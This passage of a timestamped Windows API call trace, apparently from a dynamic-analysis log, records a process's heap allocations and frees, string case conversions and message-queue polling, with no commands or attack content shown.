CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0207.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0207.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0207.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0207.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0207.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x118d020 [0207.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0207.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0207.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0207.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0207.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0207.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0207.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0207.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1292020 [0207.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13a3020 [0207.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0207.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0207.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0207.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0207.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0207.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1292020 | out: hHeap=0x970000) returned 1 [0207.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0207.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0207.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x13a3020 | out: hHeap=0x970000) returned 1 [0207.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.609] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0207.609] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0207.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0207.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0207.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0207.610] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0207.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0207.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0207.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0207.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0207.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0207.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0207.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0207.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0207.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0207.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0207.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0207.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0207.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0207.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0207.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0207.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0207.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0207.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0207.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129f020 [0207.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0207.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129f020 | out: hHeap=0x970000) returned 1 [0207.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0207.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0207.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0207.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0207.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0207.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0207.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0207.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0207.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0207.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0207.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0207.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 